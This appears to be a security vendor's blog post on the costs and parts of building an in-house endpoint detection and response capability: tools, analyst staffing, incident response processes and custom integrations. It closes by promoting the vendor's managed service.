Once a security team recognizes the value of an Endpoint Detection and Response (EDR) capability and begins to scope the project, the list of requirements starts to add up—and the cost along with it. The EDR shopping list includes hardware and software, employees to hire and manage, processes to design and implement, plus custom software and integrations to develop. While this may be feasible for a large organization with a sizable budget, it is a challenge for most businesses. It is also easy to overlook the complexities involved in implementing EDR until the project is well underway.
Here is a closer look at the elements that go into building and deploying an EDR capability to help guide you and your team.
1: Hardware and Software
First and foremost, the team will need to evaluate and select an EDR platform. Selection should involve performing proof of concepts (POCs) with a number of vendors. This can be an expensive process in and of itself. Once a selection is made, the implementation may involve procuring and setting up on-premise hardware to host the EDR tool and working with IT to test and deploy the endpoint sensor.
Anytime an organization has on-premise tools, they’ll also need ongoing internal support to keep the tools running. The level of support will vary depending on the product and the size of your organization, and it is important to include these costs.
For additional guidelines and 15 questions to ask potential vendors, download an EDR Buyer’s Guide.
2: Security Team Resources
This is one of the most crucial items on the list—and one of the most challenging. Doing EDR well requires a lot of human resources. Not only are these resources typically not a part of most security organizations, but they are extremely difficult to find and expensive to hire.
The most obvious need from a security team standpoint will be experts to respond to alerts. Based on Red Canary’s experience managing detection and response, this will initially require 1-2 analysts per 1,000 endpoints. This number should decrease over time as the team implements more efficient response processes (and with scale). Good security analysts are in high demand, so this can be one of the biggest challenges in implementing EDR. Note that analysts capable of doing endpoint response may not be the same as analysts from a typical SOC that deals primarily with network security.
Threat research is another crucial component. The detection platform must be updated continuously to monitor for new attack tactics and techniques. A company may get lucky and find a unicorn who can both respond to alerts and do threat hunting and research, but these individuals are in very short supply.
Learn why many organizations are turning to specialized security services instead of hiring.
It is also important to have access to software developers to build automation, integrations, tools, etc. Automation and integration are the secret sauce to improving efficiency and custom software is required to do it the right way for your team. This can be a major challenge because security teams typically aren’t accustomed to hiring or managing software developers. One option is to attempt to acquire resources from other parts of your organization, but this also may not be realistic.
EDR very quickly becomes a “big-data” problem, so the team will benefit from hiring a data-focused engineer or data scientist. The bigger the organization, the more data it will have, and the more value a data scientist can bring. The main goal for this individual (along with software developers) is to reduce the need to continue hiring analysts at such a high rate (1 per 500-1000 endpoints). With the right data platform and suppression capability, you can reduce the rate to 1 per 5000 endpoints or even more depending on the investment made.
3: Processes to Implement
While you can’t go out and “buy” processes, they are a core requirement that needs to be built into an EDR plan. Developing the processes that take a raw endpoint alert from creation to closed is a huge component of building a true capability. A strong Incident Response (IR) process is the most critical. SANS provides the following basic structure for an IR process:
- Preparation: Preparing users and IT staff to handle potential incidents should they arise
- Identification: Determining whether an event is indeed a security incident
- Containment: Limiting the damage of the incident and isolating affected systems to prevent further damage
- Eradication: Finding the root cause of the incident and removing affected systems from the production environment
- Recovery: Permitting affected systems back into the production environment and ensuring no threat remains
- Lessons learned: Completing incident documentation and performing analysis to ultimately learn from the incident and potentially improve future response efforts
This process needs to happen efficiently to minimize an attacker’s dwell time and limit their opportunity to steal data, money, and critical IP. Many organizations have strong IR processes in place to handle alerts from other security products and just need to fit in endpoint detection. If you don’t have IR processes in place, be prepared to take this on as part of your EDR project.
Validating a threat (Step 2 above) may seem simple, but accurately identifying threats requires a number of strong processes in and of itself. It’s also important to assess the potential risk and impact of a threat to know how to prioritize the rest of the response since most organizations will have many threats occurring at the same time.
Incorporating lessons learned back into the detection capability (Step 6) is another critical associated process. This is vitally important in EDR where attackers change tactics very rapidly. It’s important that when a new tactic is observed it can be easily codified into a detection rule, reviewed, and then rolled into the production detection environment.
For more insights on improving your incident response program, watch an on-demand webinar: How to Take Control of Your Response Operations
4: Custom Software and Integration
As a security organization implements and grows into their EDR capability, they will identify many pieces of software that can help them to become more efficient. Some can be bought, some can’t. Almost all require some amount of customization.
The most fundamental piece of software is the analysis platform. It may be possible to use the EDR tool itself for analysis, but this is usually inefficient due to the way the tools are implemented.
A good analysis platform includes (but is not limited to) the following capabilities:
- Prioritizes alerts
- Deduplicates repeated alerts
- Allows for suppression based on coarse or granular rules
- Enriches alerts with additional context
- Manages analyst workflow
- Provides mechanisms for bulk action
A very mature organization with a mature SIEM implementation in place for network security may be able to use the same tool for endpoint-related analysis. However, these tools are often bulky and not geared for new data sources.
Once an alert is confirmed as a threat via the analysis platform, it needs to move forward into the remediation phase. In many organizations, this means interacting with the IT group through their workflow. Oftentimes the IT group works off of a ticket-tracking system and the mechanism for getting remediation done is to create a ticket automatically from the confirmed threat. In bigger organizations this can get more complex since there will be multiple IT groups and the tickets will need to be routed to the correct group based on what endpoint it occurred on or what type of threat it is. The more complex this gets, the more need there is for custom software development.
In the course of performing EDR, the security team will identify many useful standalone tools that can help drive efficiencies. These may be as simple as “run a query and then massage the results into summary data” or as complicated as “do machine learning to look for patterns in binary usage.” These kinds of tools can make a massive difference in the efficiency of a security team and it pays huge dividends to have someone on the team capable of developing one-off tools from time to time. Note: many security analysts are capable of some amount of this, so an organization may not need a dedicated resource.
Implementing EDR is expensive and complicated. It takes a great deal of planning and expertise, and it’s not something you can simply drop into an existing security program. Before purchasing an EDR tool, make sure your team understands the complexities and is prepared to build the appropriate pieces to drive value from your investment.
Many Red Canary customers went through this type of evaluation before realizing that Managed Endpoint Detection and Response was more effective than assembling internal resources and expertise. Red Canary delivers a complete EDR capability that includes the required technology, processes, and people. So rather than evaluating hardware/software, hiring multiple employees, developing processes, and customizing integrations, you can simply drop Red Canary into your organization and dramatically improve your security in hours.
To learn more about how to implement an EDR capability, watch an on-demand webinar I recently held with Carbon Black. It explores the three paths to EDR and helps you understand what to consider when deciding if outsourcing is right for you.